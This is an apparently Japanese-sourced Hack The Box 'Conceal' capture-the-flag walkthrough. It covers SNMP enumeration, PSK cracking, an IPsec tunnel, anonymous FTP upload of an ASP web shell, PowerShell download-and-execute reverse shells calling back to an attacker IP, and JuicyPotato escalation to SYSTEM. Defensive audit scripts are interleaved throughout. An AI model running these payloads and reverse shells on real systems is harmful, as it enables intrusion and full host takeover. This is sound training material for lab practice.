Hack The Box walkthrough (Conceal) Writeup

nmap
TCP
nmap -sCTV -p- --stats-every 5s --min-rate 300 -oN nmap-tcp.log 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
All 65535 scanned ports on 10.10.10.116 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 11 15:35:26 2023 -- 1 IP address (1 host up) scanned in 445.25 seconds
UDP
nmap -sU -p- --stats-every 5s --min-rate 300 -oN nmap-udp.log 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
Not shown: 65533 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
500/udp open isakmp
# Nmap done at Mon Dec 11 15:41:40 2023 -- 1 IP address (1 host up) scanned in 354.67 seconds
snmp community name brute force
sudo nmap -Pn -sU --script snmp-brute 10.10.10.116 --min-rate 300 --script-args snmp-brute.communitiesdb=snmp-default.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 17:00 JST
Nmap scan report for 10.10.10.116
Host is up (0.27s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
500/udp open isakmp
Nmap done: 1 IP address (1 host up) scanned in 20.84 seconds
※snmp-default.txt was downloaded from https://github.com/SECFORCE/sparta/blob/master/wordlists/snmp-default.txt
snmpwalk
snmpwalk -c public -v1 10.10.10.116
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (4917278) 13:39:32.78
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
iso.3.6.1.2.1.2.1.0 = INTEGER: 15
iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1
iso.3.6.1.2.1.2.2.1.1.2 = INTEGER: 2
iso.3.6.1.2.1.2.2.1.1.3 = INTEGER: 3
iso.3.6.1.2.1.2.2.1.1.4 = INTEGER: 4
(truncated)
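The walk above is the whole foothold: the box's SNMP sysContact string carries a VPN pre-shared key hash, readable with the default "public" community. As an added example (not part of the original writeup), the following Python audits snmpwalk output for exactly that class of leak: it parses the system group, then flags STRING values that contain credential keywords or hash-like hex strings. The sample walk embedded below is constructed to mirror the page's output, and the keyword and digest patterns are this example's assumptions.

```python
import re

# Well-known OIDs of the SNMPv2 system group (RFC 3418), keyed by the suffix
# snmpwalk prints after "iso.3.6.1.2.1.1".
SYSTEM_GROUP = {
    "1.0": "sysDescr", "2.0": "sysObjectID", "3.0": "sysUpTime",
    "4.0": "sysContact", "5.0": "sysName", "6.0": "sysLocation",
    "7.0": "sysServices",
}
SYSTEM_PREFIX = "iso.3.6.1.2.1.1."

# Constructed sample in snmpwalk's output format, modelled on the walk above.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (4917278) 13:39:32.78
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
"""

# One snmpwalk line: <oid> = [<TYPE>: ]<value>; the type is absent for "".
LINE_RE = re.compile(r'^(?P<oid>\S+) = (?:(?P<type>[A-Za-z-]+): )?(?P<value>.*)$')
# Words an administrator tends to use when parking a secret in a free-text field
# (assumed list; extend to taste).
KEYWORD_RE = re.compile(
    r'\b(pass(?:word|wd|phrase)?|pwd|psk|pre-?shared|secret|api[-_ ]?key|token|credential)s?\b',
    re.I)
# 32/40/64 hex characters: the shapes of MD5, SHA-1 and SHA-256 digests.
HEX_DIGEST_RE = re.compile(r'\b(?:[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64})\b')


def parse_snmpwalk(text):
    """Turn snmpwalk text into a list of {oid, type, value} dicts."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        vtype, value = m.group("type"), m.group("value")
        if len(value) >= 2 and value.startswith('"') and value.endswith('"'):
            value = value[1:-1]        # unquote STRING values
            vtype = vtype or "STRING"  # the bare "" form has no type tag
        entries.append({"oid": m.group("oid"), "type": vtype, "value": value})
    return entries


def find_leaked_secrets(entries):
    """Return the STRING entries whose value looks like it holds a credential."""
    findings = []
    for e in entries:
        if e["type"] != "STRING" or not e["value"]:
            continue
        reasons = []
        if KEYWORD_RE.search(e["value"]):
            reasons.append("credential keyword")
        if HEX_DIGEST_RE.search(e["value"]):
            reasons.append("hash-like hex string")
        if reasons:
            suffix = e["oid"][len(SYSTEM_PREFIX):] if e["oid"].startswith(SYSTEM_PREFIX) else ""
            findings.append({"oid": e["oid"], "name": SYSTEM_GROUP.get(suffix, "?"),
                             "value": e["value"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_leaked_secrets(parse_snmpwalk(SAMPLE_WALK)):
        print(f"{f['name']} ({f['oid']}): {f['value']!r} <- {', '.join(f['reasons'])}")
```

Run it against a real walk by piping `snmpwalk -c public -v1 <host>` into the parser; anything it reports in sysContact or sysLocation should be removed from the MIB and the secret rotated, and the default community string replaced regardless.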
hash crack

ike-scan
ike-scan -M 10.10.10.116
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116 Main Mode Handshake returned
HDR=(CKY-R=2eaf4593e68ea822)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)
Ending ike-scan 1.9.5: 1 hosts scanned in 0.369 seconds (2.71 hosts/sec). 1 returned handshake; 0 returned notify
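The transform the responder accepted (3DES, SHA1, group 2, PSK) is what the ipsec.conf below has to mirror, and it is also what a defender should be reading off this output. As an added example (not from the writeup), the Python below parses ike-scan's SA line and rates each parameter; the thresholds are this example's assumptions, following current guidance (RFC 8247 for IKE algorithm selection, and the retirement of 3DES and SHA-1).

```python
import re

# The SA line exactly as printed by ike-scan above.
IKE_SCAN_SA = "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)"

# key=value pairs; ike-scan suffixes some keys with the attribute length, e.g. LifeDuration(4).
PARAM_RE = re.compile(r'([A-Za-z]+)(?:\(\d+\))?=(\S+)')

# Assessment tables (assumptions of this example, not ike-scan's own judgement).
WEAK_ENC = {"DES", "3DES", "IDEA", "CAST", "Blowfish", "RC5"}   # 64-bit block ciphers
WEAK_HASH = {"MD5", "SHA1"}
MIN_DH_GROUP = 14   # MODP group 14 is 2048-bit; groups 1, 2 and 5 are 768/1024/1536-bit


def parse_sa(line):
    """Parse 'SA=(k=v k=v ...)' into a dict, dropping the length suffix from keys."""
    inner = line[line.index("(") + 1:line.rindex(")")]
    return dict(PARAM_RE.findall(inner))


def lifetime_seconds(params):
    """LifeDuration is printed as hex for 4-byte attributes; return it as an int."""
    raw = params.get("LifeDuration", "0")
    return int(raw, 16) if raw.lower().startswith("0x") else int(raw)


def assess_sa(params):
    """Return (name, value, verdict, reason) tuples; verdict is weak / ok / note / info."""
    out = []
    enc = params.get("Enc", "?")
    if enc in WEAK_ENC:
        out.append(("Enc", enc, "weak", "64-bit block cipher, deprecated (Sweet32-class birthday attacks)"))
    else:
        out.append(("Enc", enc, "ok", "128-bit block cipher"))

    h = params.get("Hash", "?")
    out.append(("Hash", h, "weak" if h in WEAK_HASH else "ok",
                "deprecated PRF/integrity hash" if h in WEAK_HASH else "SHA-2 family"))

    group = params.get("Group", "?")
    try:
        gnum = int(group.split(":")[0])
        if gnum < MIN_DH_GROUP:
            out.append(("Group", group, "weak", "DH modulus below 2048 bits"))
        else:
            out.append(("Group", group, "ok", "DH modulus of 2048 bits or more"))
    except ValueError:
        out.append(("Group", group, "info", "unrecognised group encoding"))

    auth = params.get("Auth", "?")
    if auth == "PSK":
        out.append(("Auth", auth, "note",
                    "exchange security rests on PSK strength; IKEv1 Aggressive Mode would expose a crackable hash"))
    else:
        out.append(("Auth", auth, "info", "non-PSK authentication"))

    out.append(("LifeDuration", params.get("LifeDuration", "?"), "info",
                f"{lifetime_seconds(params)} seconds"))
    return out


if __name__ == "__main__":
    for name, value, verdict, reason in assess_sa(parse_sa(IKE_SCAN_SA)):
        print(f"{name:13} {value:14} {verdict:5} {reason}")
```

For this box every algorithm parameter comes out "weak"; the lifetime (0x7080 = 28800 s, eight hours) is unremarkable. On a production gateway the fix is on the responder side: restrict the proposal to AES, SHA-2 and group 14 or larger, and prefer IKEv2.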
Editing the ipsec.conf and ipsec.secrets files
sudo nano /etc/ipsec.conf
# ipsec.conf - strongSwan IPsec configuration file

# basic configuration
config setup

conn %default
    inactivity=1h
    keyexchange=ikev1
    ike=3des-sha1-modp1024
    esp=3des-sha1
    authby=secret

conn conceal
    left=10.10.14.26
    leftprotoport=tcp
    right=10.10.10.116
    rightprotoport=tcp
    rightsubnet=10.10.10.116[tcp/%any]
    type=transport
    auto=add
※Each value is taken from the information obtained with ike-scan
sudo cat /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.
# RSA private key for this host, authenticating it to any other host
# which knows the public part.
10.10.10.116 %any : PSK "Dudecake1!"
※The PSK value is the one recovered with crackstation
ipsec start
sudo ipsec start
[sudo] kali のパスワード:
Starting strongSwan 5.9.12 IPsec [starter]...
ipsec up
sudo ipsec up conceal
generating QUICK_MODE request 3024468123 [ HASH SA No ID ID ]
sending packet: from 10.10.14.26[500] to 10.10.10.116[500] (220 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.26[500] (188 bytes)
parsed QUICK_MODE response 3024468123 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
detected rekeying of CHILD_SA conceal{1}
CHILD_SA conceal{2} established with SPIs c628a505_i b76a7e0e_o and TS 10.10.14.26/32[tcp] === 10.10.10.116/32[tcp]
connection 'conceal' established successfully
nmap
nmap -sCV -p- --stats-every 5s --min-rate 300 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
Not shown: 65523 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
(truncated)
http

gobuster
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.116/ -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.116/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/upload (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]
===============================================================
Finished
===============================================================
http://10.10.10.116/upload/

ftp anonymous
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||52079|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
ftp file upload
cat test.txt
upload OK!!
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||52115|)
125 Data connection already open; Transfer starting.
100% |**************************************| 13 158.69 KiB/s --:-- ETA
226 Transfer complete.
13 bytes sent in 00:00 (0.03 KiB/s)
http://10.10.10.116/upload/

http://10.10.10.116/upload/test.txt

webshell upload
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put webshell.asp
local: webshell.asp remote: webshell.asp
229 Entering Extended Passive Mode (|||52240|)
125 Data connection already open; Transfer starting.
100% |**************************************| 1412 19.23 MiB/s --:-- ETA
226 Transfer complete.
※webshell.asp is downloaded from https://github.com/tennc/webshell/blob/master/asp/webshell.asp
http://10.10.10.116/upload/webshell.asp

reverse shell
powershell invoke-expression (New-Object Net.WebClient).DownloadString('http://10.10.14.26:8888/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 4444
※Submit this command through the input form of webshell.asp
※Invoke-PowerShellTcp.ps1 is downloaded from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Listening with a python3 HTTP server
python3 -m http.server 8888
10.10.10.116 - - [17/Dec/2023 02:20:14] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
Listening with nc
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.116] 52870
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute
proof.txt
PS C:\Users\Destitute\Desktop> cat proof.txt
b1d83f0d1b2b2a99a93dbee0fcbfc8b6
privilege escalation
privilege check
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\>
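Of the nine privileges listed, SeImpersonatePrivilege (Enabled) and SeAssignPrimaryTokenPrivilege (Disabled) are the two that matter: both are normally reserved for service accounts, and the "Disabled" state is informational, because a process can enable any privilege its token holds. As an added example (not part of the writeup), the Python below parses the `whoami /priv` table above and reports the held privileges that let an account leave its own security context; the risk list is this example's curation of widely documented abusable privileges.

```python
import re

# The "whoami /priv" table captured above (column padding is irrelevant to the parser).
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# A data row: privilege name, free-text description, then the State column.
ROW_RE = re.compile(r'^\s*(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$')

# Privileges whose holder can act outside the account's own security context
# (assumed list for this example; descriptions are the defender's one-line summary).
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate any client token the process obtains",
    "SeAssignPrimaryTokenPrivilege": "assign an arbitrary primary token to a new process",
    "SeDebugPrivilege": "open and manipulate any process, including SYSTEM ones",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "forge access tokens",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}


def parse_privileges(text):
    """Return (name, description, state) for each data row of a whoami /priv table."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((m.group(1), m.group(2).strip(), m.group(3)))
    return rows


def risky_privileges(text):
    """Held privileges from HIGH_RISK, in table order, with state and why they matter.

    State is reported but not used to filter: a Disabled privilege is still held and
    can be enabled by the process itself via AdjustTokenPrivileges.
    """
    return [(name, state, HIGH_RISK[name])
            for name, _, state in parse_privileges(text) if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in risky_privileges(WHOAMI_PRIV):
        print(f"{name:32} {state:9} {why}")
```

The mitigation is configuration rather than detection: run IIS application pools as accounts that do not hold these privileges (or under a virtual account with the privilege removed via local security policy), so a web-shell foothold stays confined to that identity.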
Upload JuicyPotato.exe and the .bat file
cat test.bat
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.26:8888/powercat.ps1');powercat -c 10.10.14.26 -p 5555 -e cmd"
※powercat.ps1 is downloaded from https://github.com/besimorhino/powercat/blob/master/powercat.ps1
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put test.bat
local: test.bat remote: test.bat
229 Entering Extended Passive Mode (|||53549|)
125 Data connection already open; Transfer starting.
100% |**************************************| 147 1.86 MiB/s 00:00 ETA
226 Transfer complete.
147 bytes sent in 00:00 (0.34 KiB/s)
※Upload in binary mode (line-ending codes and the like can otherwise be converted differently per OS)
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put JuicyPotato.exe
local: JuicyPotato.exe remote: JuicyPotato.exe
229 Entering Extended Passive Mode (|||53529|)
125 Data connection already open; Transfer starting.
100% |**************************************| 339 KiB 48.61 KiB/s 00:00 ETA
226 Transfer complete.
347648 bytes sent in 00:07 (46.18 KiB/s)
※Upload in binary mode (line-ending codes and the like can otherwise be converted differently per OS)
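Every stage of this box after the VPN (the web shell in the "webshell upload" section and the .bat and .exe dropped here) went through the same door: an anonymous FTP login writing into a directory that IIS serves as /upload/. As an added example (not from the writeup), the Python below reads a W3C-style FTP log and flags completed anonymous STOR transfers, escalating the finding when the file has a server-executable extension. The log excerpt is constructed for this example and its field set is declared in the #Fields header; it is not claimed to match any specific IIS logging configuration.

```python
import os

# Constructed, simplified W3C-format FTP log for this example (not real server output).
SAMPLE_FTP_LOG = """\
#Software: (constructed sample)
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2023-12-17 02:10:01 10.10.14.26 - USER anonymous 331
2023-12-17 02:10:01 10.10.14.26 anonymous PASS *** 230
2023-12-17 02:10:05 10.10.14.26 anonymous STOR /test.txt 226
2023-12-17 02:15:12 10.10.14.26 anonymous STOR /webshell.asp 226
2023-12-17 02:45:30 10.10.14.26 anonymous STOR /test.bat 226
2023-12-17 02:45:40 10.10.14.26 anonymous STOR /JuicyPotato.exe 226
2023-12-17 02:46:00 10.10.14.26 anonymous RETR /test.txt 226
2023-12-17 03:00:00 10.10.14.30 alice STOR /report.pdf 226
"""

# Extensions IIS will execute as script, or a shell will run, if they land in a web root
# (assumed list; tune to the handlers actually mapped on the server).
EXECUTABLE_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".exe", ".dll", ".bat", ".cmd", ".ps1"}


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue          # other directives, or data before any #Fields line
        parts = line.split()
        if len(parts) != len(fields):
            continue          # skip malformed rows rather than misalign columns
        records.append(dict(zip(fields, parts)))
    return records


def find_risky_uploads(records):
    """Flag completed anonymous STORs; add a second finding for executable content."""
    findings = []
    for r in records:
        if r.get("cs-method", "").upper() != "STOR":
            continue
        if not r.get("sc-status", "").startswith("2"):
            continue          # only transfers the server reported as completed
        if r.get("cs-username", "").lower() != "anonymous":
            continue
        base = {"time": f"{r['date']} {r['time']}", "ip": r["c-ip"], "file": r["cs-uri-stem"]}
        findings.append({**base, "rule": "anonymous-write"})
        if os.path.splitext(r["cs-uri-stem"])[1].lower() in EXECUTABLE_EXT:
            findings.append({**base, "rule": "executable-upload"})
    return findings


if __name__ == "__main__":
    for f in find_risky_uploads(parse_w3c(SAMPLE_FTP_LOG)):
        print(f"{f['time']}  {f['ip']:15} {f['rule']:18} {f['file']}")
```

Either rule firing is worth an alert, but the real fix is structural: anonymous FTP should have no write permission, and the FTP root should never be the same directory tree that IIS serves.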
Running JuicyPotato
PS C:\inetpub\wwwroot> ./JuicyPotato.exe -l 443 -p test.bat -t * -c '{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}'
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 443
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
Listening with a python3 HTTP server
python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.10.116 - - [17/Dec/2023 02:50:09] "GET /powercat.ps1 HTTP/1.1" 200 -
Listening with nc
nc -lnvp 5555
listening on [any] 5555 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.116] 53777
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
proof.txt is in the usual place.